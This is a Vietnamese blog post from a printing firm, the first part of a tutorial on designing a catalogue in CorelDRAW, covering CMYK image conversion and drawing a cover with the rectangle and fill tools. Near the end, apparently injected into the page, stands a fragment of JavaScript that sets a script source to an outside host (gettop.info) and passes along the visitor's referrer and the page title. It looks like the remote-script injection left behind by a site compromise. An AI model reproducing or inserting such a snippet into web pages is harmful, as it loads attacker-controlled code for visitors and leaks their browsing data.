In ấn - thiết kế

Hướng dẫn thiết kế catalogue bằng phần mềm CorelDRAW (Kỳ 1)

Hướng dẫn thiết kế catalogue bằng phần mềm CorelDRAW (Kỳ 1)

Hướng dẫn thiết kế catalogue bằng phần mềm CorelDRAW (Kỳ 1)

Đánh giá in sản phẩm

Thiết kế catalogue với mục đích quảng bá hình ảnh, thương hiệu, dịch vụ hay sản phẩm của doanh nghiệp là một trong những việc cực kỳ cần thiết trong việc thúc đẩy kinh doanh, gia tăng lợi nhuận, đồng thời tăng vị thế của công ty trên thị trường. Chính vì thế mà khi tung ra chiến dịch marketing, các doanh nghiệp thường sử dụng hình thức quảng cáo bằng catalogue. Việc thiết kế catalogue không quá dễ nhưng không hẳn là khó, trong chuỗi bản tin chúng tôi ngày hôm nay sẽ hướng dẫn thiết kế catalogue bằng phần mềm CorelDRAW để bạn đọc quan tâm cùng tham khảo.

Chuẩn bị cho quá trình thiết kế catalogue

Để có thể làm tốt quá trình thiết kế catalogue thì cần hoàn thành đầy đủ bước chuẩn bị này. Trong đó, cần thu thập tất cả hình ảnh của catalogue trong một thư mục và chuyển chúng về chế độ màu màu CMYK, đó là chế độ được sử dụng cho in ấn chuyên nghiệp. cụ thể: Mở Corel PHOTO-PAINT. Chọn tất cả các hình ảnh trong thư mục bằng cách chọn menu File/Mở. Đối với mỗi hình ảnh, chọn menu hình ảnh /Chuyển đổi sang màu CMYK. Chọn File Menu/Save as. Chọn Tif như các loại định dạng tập tin.

Thiết kế catalogue

Khi hình ảnh đã sẵn sàng cho quá trình in ấn thì nên kiểm tra lại. Sau đó bạn luôn luôn có thể nhận được thông tin về các chế độ màu khi bạn nhấp chuột vào một hình ảnh trong CorelDRAW. Cuối cùng, bạn có thể xem các thông tin về hình ảnh trong thanh trạng thái ở dưới cùng của màn hình. Cần lưu ý rằng nếu hình ảnh ở chế độ bitmap RGB, chọn Bitmap-menu | Mode | CMYK Colour. Bước thứ hai là để vẽ đồ họa: Trang bìa giống như một cánh cửa. Các bóng đèn. Biểu tượng Starburst phục vụ.

Các bước thực hiện thiết kế catalogue bằng phần mềm CorelDRAW

Bước 1: Vẽ trang bìa cho catalogue

  1. Tạo một tài liệu mới bằng cách chọn các File-menu/New.
  2. Chỉnh sửa kích thước trang trong Property Bar.
  3. Tạo một hình chữ nhật bao gồm toàn bộ trang, bằng cách nhấp đúp công cụ Rectangle Tool.
  4. Tiếp tục tạo ra những ảo ảnh của một bề mặt kim loại với công cụ Fill Tool.
  5. Sau đó, kéo theo chiều ngang trên hình chữ nhật với các tương tác Fill Tool, và bạn tạo ra một gradient điền mà cần phải được chỉnh sửa. Theo mặc định nó sẽ có màu đen và trắng, và tuyến tính. Bạn có thể chỉnh sửa các loại điền vào Bar tài sản.
  6. Chọn Interactive Fill Tool một lần nữa, và bạn sẽ thấy một nửa vòng tròn với đường chấm trong hình chữ nhật.

Xem tiếp: Hướng dẫn thiết kế catalogue bằng phần mềm CorelDRAW – Kỳ 2

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }

Posted in: Thông tin in ấn

Leave a Comment (0) ↓